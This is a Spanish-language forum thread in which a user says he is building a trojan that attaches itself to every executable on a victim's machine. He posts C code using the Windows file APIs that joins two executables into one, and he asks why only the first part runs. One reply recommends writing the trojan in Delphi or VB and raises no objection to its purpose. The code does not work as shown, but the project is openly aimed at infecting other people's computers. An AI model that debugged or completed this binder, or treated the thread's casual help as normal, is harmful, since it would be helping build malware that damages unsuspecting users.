Páginas: [1]
|
 |
|
Autor
|
Tema: Problema Intento de Troyano xD (Leído 239 veces)
|
|
germandc
|
Holas, estoy creando un troyano y quise hacer que cuando la victima lo habra busque todos los ejecutables y se agregue a los que encuentre, para hacerlo lo hice con las API's CreateFile, WriteFile y ReadFile. Asi es como lo hice: #include <windows.h> #include <stdio.h> main() { DWORD writed,MSize,readed,VSize; LPSTR MContent,VContent; HANDLE nuevo,server,nuevor; server=CreateFile("C:\\servidor.exe",GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); if (server!=INVALID_HANDLE_VALUE) { MSize = GetFileSize(server, NULL); MContent = (LPSTR)GlobalAlloc(GPTR,MSize+1); if(MContent!=NULL)
{ ReadFile( server, MContent, MSize, &readed, 0); CloseHandle(server); }
nuevor=CreateFile("C:\\nuevo.exe",GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); if (nuevor!=INVALID_HANDLE_VALUE) { VSize = GetFileSize(nuevor, NULL); VContent = (LPSTR)GlobalAlloc(GPTR,VSize+1); if(VContent!=NULL)
{ ReadFile( nuevor, VContent, VSize, &readed, 0); CloseHandle(nuevor); }
nuevo=CreateFile("C:\\servnue.exe", GENERIC_WRITE,0,0, OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); } if (nuevo!=INVALID_HANDLE_VALUE) { WriteFile( nuevo, VContent, VSize, &writed, 0); WriteFile( nuevo, MContent, MSize, &writed, 0); CloseHandle(nuevo); } } }
Lo que intenta hacer es leer servidor.exe y nuevo.exe y juntarlos en servnue.exe. Me resulto muy facil, y como es normal no funciona, solo ejecuta el primero que agregue con WriteFile. ¿Esta muy mal el codigo o le falta algo? Gracias, Chau
|
|
|
|
|
|
|
|
|
K-19
Sarah Wayne
|
|
|
|
|
|
|
|
|
|
EsTeBaN~
|
Aparte de lo que dijo K-19 que tiene mucha razón, otra cosa es que, ya sabemos que C++ es un lenguaje muy potente y mas rápido que los otros, pero se te va a hacer difícil programar un troyano completo en ese lenguaje :S Sería muy largo el code, y te va a llevar mucho tiempo. Mejor lo haces en delphi, o VB o alguno de esos que son mas fáciles. Ahora bien, si vos lo querés hacer en C++ porque te resulta más comodo, o porque te querés superar, o algo parecido, entonces está bien, era nada más una recomendación. Yo no te puedo ayudar mucho porque recién empezé con C++, asi que se menos de lo básico, pero ya te van a ayudar si lo posteas en el foro correspondiente  Saludos
|
|
|
|
|
|
|
|
|
|
Páginas: [1]
|